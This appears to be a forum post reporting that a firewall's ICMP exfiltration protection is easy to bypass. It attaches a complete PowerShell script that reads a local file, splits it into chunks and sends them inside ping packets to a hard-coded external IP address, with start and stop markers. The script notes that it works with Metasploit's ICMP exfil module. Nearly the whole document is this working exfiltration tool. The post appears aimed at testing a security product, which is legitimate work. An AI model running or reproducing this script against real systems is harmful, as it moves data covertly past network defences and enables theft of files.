The icmp tunnel/exfill defined in the APPL blade is easy to bypass with all ICMP exfil blocked in the rulebase.
See attached 59 line powershell script.
 
#    Powershell-ICMP-Sender
#    ICMP Exfiltration script
#    Author: Oddvar Moe (@oddvarmoe)
#    License: BSD 3-Clause
#    Required Dependencies: None
#    Optional Dependencies: None
#    Early alpha version
# Script will take the infile you specify in the $inFile variable and divide it into 1472 byte chunks before sending
# This script also works with Metasploit's ICMP Exfil module: https://www.rapid7.com/db/modules/auxiliary/server/icmp_exfil
# Inspiration from : https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1
# TODO:
# Need transfer check
# Speeding it up using different methods
# Make it function based
    $IPAddress = "52.149.97.185"
    $ICMPClient = New-Object System.Net.NetworkInformation.Ping
    $PingOptions = New-Object System.Net.NetworkInformation.PingOptions
    $PingOptions.DontFragment = $true
    #$PingOptions.Ttl = 10
    
    # Must be divided into 1472 chunks
    [int]$bufSize = 1000
    $inFile = "C:\Users\awa\Documents\wrk\src\pingtunnel\test.txt"
    #$inFile = "C:\Users\awa\Desktop\FortiSandbox-4.0.2-JSON API Reference.pdf"
    
    $stream = [System.IO.File]::OpenRead($inFile)
    $chunkNum = 0
    $TotalChunks = [math]::floor($stream.Length / 1000)
    $barr = New-Object byte[] $bufSize
    
    # Start of Transfer
    $sendbytes = ([text.encoding]::ASCII).GetBytes("---START---")
    $ICMPClient.Send($IPAddress,10, $sendbytes, $PingOptions) | Out-Null
    # start PDF: 12:23
    while ($bytesRead = $stream.Read($barr, 0, $bufsize)) {
        #Write-Host $barr
        
        $ICMPClient.Send($IPAddress,10, $barr, $PingOptions) | Out-Null
        $ICMPClient.PingCompleted
        
        #Missing check if transfer is okay, added sleep.
        #sleep 1
        #$ICMPClient.SendAsync($IPAddress,60 * 1000, $barr, $PingOptions) | Out-Null
        
        Write-Output "Done with $chunkNum out of $TotalChunks"
        $chunkNum += 1
    }
    # End the transfer
    $sendbytes = ([text.encoding]::ASCII).GetBytes("---STOP---")
    $ICMPClient.Send($IPAddress,10, $sendbytes, $PingOptions) | Out-Null
    Write-Output "File Transfered"